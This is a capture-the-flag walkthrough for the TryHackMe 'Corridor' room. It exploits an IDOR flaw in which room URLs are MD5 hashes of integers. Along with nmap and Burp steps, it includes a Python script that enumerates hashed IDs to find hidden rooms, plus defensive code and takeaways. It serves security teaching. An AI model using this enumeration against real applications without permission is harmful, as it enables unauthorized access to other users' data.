Overview
Room: Corridor | Difficulty: Easy | Platform: TryHackMe
Goal: Find the flag by exploiting an IDOR (Insecure Direct Object Reference) vulnerability via hash manipulation
Reconnaissance
Nmap Scan
nmap -sV -sC <target-ip>
Open ports:
- 22 — SSH (OpenSSH)
- 80 — HTTP (Flask/Python web app)
Web Enumeration
Step 1 — Visit the Website
Navigate to http://<target-ip>
You'll see a corridor with multiple doors — each door is clickable and leads to a different "room" (URL).
Step 2 — Click the Doors
Click on any door. Notice the URL changes to something like:
http://<target-ip>/c4ca4238a0b923820dcc509a6f75849b
💡 A 32-character lowercase hex string is exactly the shape of an MD5 hash!
Step 3 — Identify the Hashes
Click each door and note the hashes in the URL:
Door    URL hash
1       c4ca4238a0b923820dcc509a6f75849b
2       c81e728d9d4c2f636f067f89cc14862c
3       eccbc87e4b5ce2fe28308fd9f2a7baf3
4       a87ff679a2f3e71d9181a67b7542122c
...     ...
Look them up on CrackStation, or hash the obvious candidates yourself on the command line (md5sum prints the hash followed by "  -"):
echo -n "1" | md5sum
# c4ca4238a0b923820dcc509a6f75849b
echo -n "2" | md5sum
# c81e728d9d4c2f636f067f89cc14862c
💡 The hashes are simply the MD5 of the integers 1, 2, 3… one per door, in order!
Exploitation — IDOR via Hash Manipulation
Step 4 — Understanding the Vulnerability
The app uses the MD5 hash of the room number as the URL path, and that path is the only thing that selects which room the server returns. Nothing checks whether the caller should be allowed to see that room, so anyone who can compute the hash can open any room, including ones no door links to, such as room 0.
Step 5 — Generate MD5 of 0
echo -n "0" | md5sum
Output:
cfcd208495d565ef66e7dff9f98764da  -
Step 6 — Navigate to Room 0
Visit:
http://<target-ip>/cfcd208495d565ef66e7dff9f98764da
🚩 Flag found!
Using Burp Suite (Alternative Method)
Step 7 — Intercept with Burp
- Open Burp Suite and set your browser proxy to 127.0.0.1:8080
- Click a door on the corridor page
- Intercept the request in Burp
Step 8 — Send to Repeater
- Right-click the request → Send to Repeater
- Modify the hash in the URL to the MD5 of 0:
GET /cfcd208495d565ef66e7dff9f98764da HTTP/1.1
- Click Send
🚩 Flag appears in the response!
What is IDOR?
Insecure Direct Object Reference (IDOR) occurs when an application uses user-controllable input to access objects directly without proper authorization checks.
In this case:
Normal flow: User clicks door → MD5 hash in URL → Server returns room
Exploit flow: Attacker crafts MD5 hash of "0" → Server returns hidden room with flag
The server resolves the hash to a room and returns it without ever asking whether this user may see it. The hash is a reference, not a credential: knowing it is not the same as being authorized.
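To make the difference between the two flows concrete, here is an added example (not the room's actual Flask code, whose source is not shown) that models the request handler in plain Python: one lookup that returns whatever the hash resolves to, and a hardened one that makes the authorization decision from server-side session state. The room table, the "public" attribute and the caller_rooms entitlement set are assumptions for the example; the reference scheme (md5 of the room number) is the one observed on the page.

```python
import hashlib
import secrets

# Constructed room table standing in for the server's data. "public" is an
# assumed attribute; the real room's data model is not shown on the page.
ROOMS = {
    0: {"content": "flag{constructed-example}", "public": False},
    1: {"content": "Room 1", "public": True},
    2: {"content": "Room 2", "public": True},
    3: {"content": "Room 3", "public": True},
}


def room_ref(room_id: int) -> str:
    """The reference scheme the page observed: unsalted MD5 of the room number."""
    return hashlib.md5(str(room_id).encode()).hexdigest()


# Server-side map from URL reference to room ID.
REF_TO_ID = {room_ref(i): i for i in ROOMS}


def vulnerable_handler(ref: str):
    """Models the exploited behaviour: the path selects the room and nothing
    asks whether the caller may read it. Returns (status, body)."""
    room_id = REF_TO_ID.get(ref)
    if room_id is None:
        return 404, "Not Found"
    return 200, ROOMS[room_id]["content"]


def hardened_handler(ref: str, caller_rooms: frozenset):
    """Same lookup, but the authorization decision comes from the caller's
    server-side session (caller_rooms), never from anything in the request.

    A non-public room the caller is not entitled to looks exactly like a room
    that does not exist, so the response does not confirm the object either.
    """
    room_id = REF_TO_ID.get(ref)
    if room_id is None:
        return 404, "Not Found"
    room = ROOMS[room_id]
    if not room["public"] and room_id not in caller_rooms:
        return 404, "Not Found"
    return 200, room["content"]


def issue_opaque_refs() -> dict:
    """Complementary fix: references that cannot be derived from the ID.

    Random tokens stop enumeration of neighbouring IDs, but they are still
    not authorization; the check in hardened_handler stays regardless.
    """
    return {secrets.token_urlsafe(24): room_id for room_id in ROOMS}


if __name__ == "__main__":
    hidden = room_ref(0)
    print("vulnerable, anonymous:", vulnerable_handler(hidden))
    print("hardened, anonymous:  ", hardened_handler(hidden, frozenset()))
    print("hardened, entitled:   ", hardened_handler(hidden, frozenset({0})))
```

The point of the two fixes being separate is that opaque identifiers only raise the cost of guessing; the moment a reference leaks (a shared link, a log line, a referrer header) the authorization check is the only thing left.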
Summary of Attack Chain
Visit Website → Corridor with Doors
↓
Click Doors → Notice MD5 Hashes in URL
↓
Identify Pattern → Hashes = MD5 of integers
↓
Generate MD5 of "0" → cfcd208495d565ef66e7dff9f98764da
↓
Navigate to /cfcd208495d565ef66e7dff9f98764da
↓
Flag Retrieved!
Flags
Flag        Location
Root flag   http://<target-ip>/cfcd208495d565ef66e7dff9f98764da
Key Takeaways
- IDOR falls under Broken Access Control, A01 in the OWASP Top 10 (2021), and is extremely common in real-world apps
- Never trust client-supplied identifiers — always make the authorization decision server-side, from the session, not from the request
- Hashing ≠ Security — an unsalted MD5 of a predictable value (small integers here) is not reversed, it is simply recomputed: anyone can hash 0, 1, 2… and compare
- Enumeration mindset — always inspect URLs, cookies, and parameters for patterns
- Tools like Burp Suite make it easy to manipulate requests and test for IDOR
Extra — Automate with Python
Want to brute force all rooms automatically?
import hashlib
import requests

target = "http://<target-ip>/"

# Rooms are referenced by the MD5 of a small integer, so hash each candidate
# ID and request it. Boundary values such as -1 and 0 are included on purpose:
# hidden rooms tend to sit at IDs the UI never links.
for i in range(-1, 20):
    hash_val = hashlib.md5(str(i).encode()).hexdigest()
    url = target + hash_val
    r = requests.get(url, timeout=5)
    # Every linked door also returns 200, so status alone proves nothing;
    # report only rooms whose body mentions a flag.
    if r.status_code == 200 and "flag" in r.text.lower():
        print(f"[+] Room {i} → {url}")
        print(r.text[:500])
🐍 This script requests rooms -1 through 19 and prints any whose response mentions a flag!
💡 Pro Tip: Always test boundary values like 0, -1, or very large numbers when you spot numeric-based object references — hidden resources are often lurking at unexpected IDs!